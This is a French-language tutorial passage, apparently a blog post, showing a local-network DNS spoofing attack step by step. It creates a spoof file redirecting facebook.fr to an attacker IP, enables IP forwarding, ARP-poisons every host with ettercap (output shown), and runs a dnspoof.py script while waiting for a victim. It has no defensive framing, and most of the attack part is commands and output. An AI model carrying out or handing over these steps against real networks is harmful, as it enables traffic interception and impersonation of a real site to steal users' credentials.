Application



Commençont d'abord par crée notre fichier dns.spoof avec les informations necessaire pour rediriger toute demandes de résolution du nom de domaine facebook.fr vers l'adresse 192.168.178.48

root@St0rn:~/Desktop/DNS# vi dns.spoof
facebook.fr A 192.168.178.48
www.facebook.fr A 192.168.178.48

:wq
root@St0rn:~/Desktop/DNS# cat dns.spoof
facebook.fr A 192.168.178.48
www.facebook.fr A 192.168.178.48


Maintenant nous devont réussir à voir le traffic sur le réseau pourrécupérer le numero d'identification (ID), nous allons donc nous placer en Man In THe Middle sur le réseau

root@St0rn:~/Desktop/DNS# echo 1 > /proc/sys/net/ipv4/ip_forward
root@St0rn:~/Desktop/DNS# cat /proc/sys/net/ipv4/ip_forward
1
root@St0rn:~/Desktop/DNS# ettercap -Tqi eth0 -M arp:remote // //

ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team

Listening on:
  eth0 -> C8:9C:DC:6A:8A:B0
	  192.168.178.48/255.255.255.0
	  fe80::ca9c:dcff:fe6a:8ab0/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
16074 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


Maintenant que nous controlons le traffic de tout le réseau ils nous reste plus qu'a lancer notre script et d'attendre que quelqu'un se rende sur le domaine que nous avons configuré dans dns.spoof

root@St0rn:~/Desktop/DNS# python dnspoof.py eth0


Notre script réagit à une demande de résolution



Et voici le résultat sur la machine victime